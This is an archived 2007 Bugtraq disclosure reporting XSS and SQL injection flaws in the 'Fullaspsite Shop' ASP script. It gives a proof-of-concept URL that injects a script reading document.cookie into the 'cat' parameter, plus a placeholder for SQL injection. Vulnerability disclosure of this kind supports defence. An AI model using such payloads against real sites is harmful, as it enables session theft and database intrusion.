[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Fullaspsite Shop (tr) Xss & SqL İnj. VulnZ.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Fullaspsite Shop (tr) Xss & SqL İnj. VulnZ.
From: ShaFuq31@xxxxxxxxxxx
Date: 13 Feb 2007 19:50:13 -0000

Fullaspsite Shop (tr) Xss & SqL &#304;nj. VulnZ.

Found By : ShaFuck31

Risk : Medium

VulnZ : Xss & SqL Injection

Vuln. :

http://victim.com/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script>

http://victim.com/ScriptPath/listmain.asp?cat=[ SqL Code ]

GreetZ : BLaSTER , DesquneR , The RéD , Dekolax .. AnD aLL of my friendZ...

Prev by Date: RE: Solaris telnet vulnberability - how many on your network?
Next by Date: Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?
Previous by thread: UPDATE: [ GLSA 200611-05 ] Netkit FTP Server: Privilege escalation
Next by thread: [ GLSA 200702-01 ] Samba: Multiple vulnerabilities
Index(es):
- Date
- Thread